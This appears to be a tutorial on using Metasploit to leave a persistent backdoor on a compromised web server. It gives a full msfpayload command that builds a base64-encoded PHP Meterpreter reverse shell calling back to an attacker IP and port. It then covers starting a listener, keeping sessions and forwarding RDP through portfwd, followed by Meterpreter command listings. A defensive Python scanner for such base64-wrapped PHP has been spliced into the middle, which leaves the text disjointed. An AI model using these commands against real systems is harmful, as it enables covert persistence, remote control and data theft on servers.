1, Preparation
The scenario: we have obtained a webshell and want to leave a backdoor. For this we can use msfpayload and msfconsole together.
Start the PostgreSQL service: service postgresql start
Start the Metasploit service: service metasploit start
Start msfconsole: msfconsole
Check the database connection status: db_status
Generate Backdoor Files
msfpayload php/meterpreter/reverse_tcp LHOST=192.168.133.128 LPORT=5555 R | msfencode -e php/base64 -t raw -o /root/desktop/exp.php
The <?php ?> tags need to be added to exp.php.
Start listening on the attacking side
Or
192.168.133.128 5555
Then visit our backdoor file.
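Seen from the defending side, a file like exp.php can be found in a web root by looking for a base64 wrapper whose decoded body opens a network connection. The sketch below is an added example, not part of the original page or of Metasploit. It assumes the wrapper is a plain eval(base64_decode('...')) call with one quoted literal; the names inspect_php and NET_CALLS and the sample strings are constructed for illustration.

```python
import base64
import binascii
import re

# eval(base64_decode(<quoted literal>)): the assumed wrapper form (see lead-in).
WRAPPED = re.compile(
    r"eval\s*\(\s*base64_decode\s*\(\s*(['\"])([A-Za-z0-9+/=\s]{16,})\1\s*\)\s*\)",
    re.IGNORECASE,
)
# PHP network calls a reverse-connecting script needs once decoded.
NET_CALLS = ("fsockopen", "stream_socket_client", "socket_create", "socket_connect")


def inspect_php(source: str) -> list[dict]:
    """Return one finding per eval(base64_decode(...)) wrapper in PHP source."""
    findings = []
    for match in WRAPPED.finditer(source):
        blob = re.sub(r"\s+", "", match.group(2))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("latin-1")
        except (binascii.Error, ValueError):
            continue  # literal is not valid base64, so nothing to decode
        hits = [name for name in NET_CALLS if name in decoded.lower()]
        findings.append({
            "offset": match.start(),
            "decoded_length": len(decoded),
            "network_calls": hits,
            # Decoded network code is a strong signal; a bare wrapper needs review.
            "severity": "high" if hits else "review",
        })
    return findings


def _wrap(php_body: str) -> str:
    """Build a constructed test file: <?php eval(base64_decode('...')); ?>"""
    blob = base64.b64encode(php_body.encode()).decode()
    return "<?php eval(base64_decode('%s')); ?>" % blob


# Constructed, inert samples (fragments only, no working payload).
SAMPLE_SUSPICIOUS = _wrap('$s = fsockopen("192.0.2.10", 5555); /* constructed */')
SAMPLE_ODD = _wrap('echo "template cache fragment, constructed";')
SAMPLE_CLEAN = "<?php echo base64_encode('hello'); ?>"

if __name__ == "__main__":
    for name, src in [("suspicious", SAMPLE_SUSPICIOUS), ("odd", SAMPLE_ODD),
                      ("clean", SAMPLE_CLEAN)]:
        print(name, inspect_php(src))
```

Run it over every .php file under the document root and triage "high" findings first; wrappers that build the base64 string by concatenation are outside what this pattern matches.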
2, What if we want to keep the sessions we obtain? You must first connect to the database.
exploit -h
    -e <opt>  The payload encoder to use. If none is specified, ENCODER is used. (payload encoding, default usage)
    -f        Force the exploit to run regardless of the value of MinimumRank.
    -h        Help banner.
    -j        Run in the context of a job. (run in the background)
    -n <opt>  The NOP generator to use. If none is specified, NOP is used.
    -o <opt>  A comma separated list of options in VAR=VAL format.
    -p <opt>  The payload to use. If none is specified, PAYLOAD is used.
    -t <opt>  The target index to use. If none is specified, TARGET is used.
    -z        Do not interact with the session after successful exploitation. (put the session into the background)
sessions -h
    -K        Terminate all sessions (kill all sessions)
    -c <opt>  Run a command on the session given with -i, or all (execute a command)
    -d <opt>  Detach an interactive session
    -h        Help banner
    -i <opt>  Interact with the supplied session ID (connect to a session)
    -k <opt>  Terminate sessions by session ID and/or range
    -l        List all active sessions
    -q        Quiet mode
    -r        Reset the ring buffer for the session given with -i, or all
    -s <opt>  Run a script on the session given with -i, or all
    -t <opt>  Set a response timeout (default: the)
    -u <opt>  Upgrade a shell to a meterpreter session on many platforms
    -v        List verbose fields
3, Meterpreter usage
Core Commands (core commands)
=============
    Command                   Description
    -------                   -----------
    ?                         Help menu (view help)
    background                Backgrounds the current session (put the session into the background)
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session (quit)
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode (open a Ruby terminal)
    load                      Load one or more meterpreter extensions
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands (file commands)
============================
    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands (network commands)
===========================
    Command       Description
    -------       -----------
    portfwd       Forward a local port to a remote service (port forwarding)

portfwd add -l 5555 -p 3389 -r 192.168.198.129
(forwards port 3389 on 192.168.198.129 to local port 5555)

Stdapi: System Commands
=======================
    Command       Description
    -------       -----------
    execute       Execute a command
    getenv        Get one or more environment variable values
    getpid        Get the current process identifier
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    shell         Drop into a system command shell (spawn a shell)
    sysinfo       Gets information about the remote system, such as OS (view system information)
Attached: A tentative study of Meterpreter
msfpayload reverse shell